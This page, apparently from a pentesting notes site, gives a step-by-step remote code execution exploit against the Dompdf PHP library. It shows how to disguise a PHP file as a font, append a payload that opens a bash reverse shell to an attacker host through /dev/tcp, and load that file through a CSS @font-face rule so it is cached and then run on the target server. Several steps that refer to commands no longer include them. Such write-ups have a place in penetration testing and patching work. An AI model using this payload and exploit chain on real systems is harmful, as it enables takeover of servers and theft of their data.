search
The Hacker's Notes
githubEdit

Dompdf RCE

Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.

hashtag
Exploitation

hashtag
1. Create Malicious Font

First off, we need to prepare the malicious .ttf file. Here, we find the .ttf file in our local system and copy it to the current directory and change the extention ttf to php because we want to execute PHP script.

find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php

Then add the PHP payload at the end of the file.

...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>

hashtag
2. Create Malicious CSS

Next we create a malicious CSS that load the above “evil.php”.

@font-face {
  font-family: 'evil';
  src: url('http://10.0.0.1:8000/evil.php');
  font-weight: 'normal';
  font-style: 'normal';
}

hashtag
3. Host PHP & CSS

Now we have the two files in current working directory.

Start web server to host them.

hashtag
4. Send Request

In target website, send request to upload the HTML as below.

Our “evil.php” is uploaded to /dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php. For example, /dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php.

To get the md5 hash, we can calculate it by the following command.

Also we can use Python hashlib module.

hashtag
5. Execute Malicious PHP via Cached File

Finally we get the cached file path as above so we can get the cached PHP file that executes malicious code. For reverse shell, we need to start a listener in local.

Now access to the cached PHP file.

We get a shell in local terminal.

hashtag
Exploitation (Automatically)

Also we can exploit with the repositoryarrow-up-right.

Modify CSS and PHP depending on your situation. Please see the previous "Exploitation" section for the details of each file.

Then send request.

hashtag
References

PreviousClipBucket PentestingNextDump Git Repository from Website

Last updated